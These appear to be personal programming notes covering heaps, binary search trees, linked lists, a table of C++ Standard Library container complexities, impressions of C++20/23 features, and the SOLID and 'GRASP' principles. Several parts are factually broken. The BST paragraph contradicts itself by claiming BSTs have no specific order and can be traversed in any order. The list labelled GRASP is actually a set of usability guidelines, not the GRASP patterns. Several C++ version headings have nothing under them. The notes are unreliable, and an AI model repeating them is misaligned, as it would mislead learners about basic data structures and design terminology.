A heap is a special type of tree-based data structure that stores data in a specific way such that it can be efficiently accessed. Heaps are typically implemented as binary trees, and the elements stored in a heap must have a specific order. Heaps are commonly used for priority queues, and can also be used for sorting.

A binary search tree (BST) is a type of tree-based data structure that can be used to store data in an organized way. BSTs are typically implemented as binary trees, and the elements stored in a BST must have a specific order. BSTs are commonly used for searching and sorting data, and can also be used to store data in an efficient manner. Unlike heaps, BSTs do not have a specific order and can be traversed in any order.

Singly linked lists

Adding/removing at the beginning is O(1), but adding at the end means search the whole list, therefore O(n). Searching is also O(n).

std::forward_list is a singly linked list.

Doubly linked lists

Like a singly linked list but we can iterate both ways. It stores a pointer to both the beginning and end, therefore operations on the end are also O(1).

std::list is a doubly linked list.

C++ Standard Library container complexities

Container Insertion Deletion Lookup
vector O(1) O(n) O(n)
list O(1) O(1) O(n)
set O(log n) O(log n) O(log n)
map O(log n) O(log n) O(log n)
unordered_set O(1) O(1) O(1)
unordered_map O(1) O(1) O(1)

However, the conventional CS wisdom for when to use a linked list over contiguous storage hasn’t applied for years: you have to measure. E.g., if a container fits in the cache, a vector might outperform everything else.


C++ standards

As of 7 September 2023:

The big things for me are ranges and views, so effortlessly express and manipulate ranges of data with zero iterators; they read naturally and are also lazy-evaluated (looking forward to ranges_to<>). Concepts I’ve used a little, but mostly to narrow the allowed types of an auto parameter: e.g., std::floating_point auto.

I’ve attempted to deep dive into templates a few times and it’s really quite an unpleasant language! However, whilst not a recent addition, constexpr is becoming increasingly supported; it gives you the readability of “normal” code with the potential performance benefits of compile-time. And it also finds UB! However, you quickly hit the issue where something isn’t constexpr so you have to either implement it yourself or not bother.

Coroutines are quite high-profile but I haven’t got into them yet. Finally, the multidimensional array operator should be an interesting addition.

Things that are in the standard but aren’t properly supported: modules haven’t yet been implemented sufficiently in gcc or clang. std::print is really cool but you still need to install a separate library (fmtlib).

Notable mentions from C++17 are structured bindings and execution policy.

C++23

See the presentation by Marc Gregoire (CppCon 2022).

Not implemented yet

Not supported in gcc 13.2.

Ranges and views (part two)

A lot of effort has gone into ranges and views C++23.

std::ranges

std::views

C++20

C++17

Also see cppreference.

C++14

C++14 is an extension and improvement of C++11.

C++11


SOLID

  1. Single Responsibility Principle
  2. Open/Closed Principle
  3. Liskov Substitution Principle
  4. Interface Segregation Principle
  5. Dependency Inversion Principle

GRASP

Less common but another set of principles to consider.

  1. Reduce complexity.
  2. Make information visible.
  3. Provide feedback.
  4. Support internal and external goals.
  5. Use natural mappings.
  6. Provide constraints to reduce errors.
  7. Design for diversity.
  8. Allow personalization and customization.
  9. Use recognition rather than recall.
  10. Allow for error recovery.
  11. Design for the task, not the technology.
  12. Make it easy to undo.
  13. Avoid unnecessary work.
  14. Make it easy to learn.
  15. Provide a conceptual model.
  16. Make it pleasurable to use.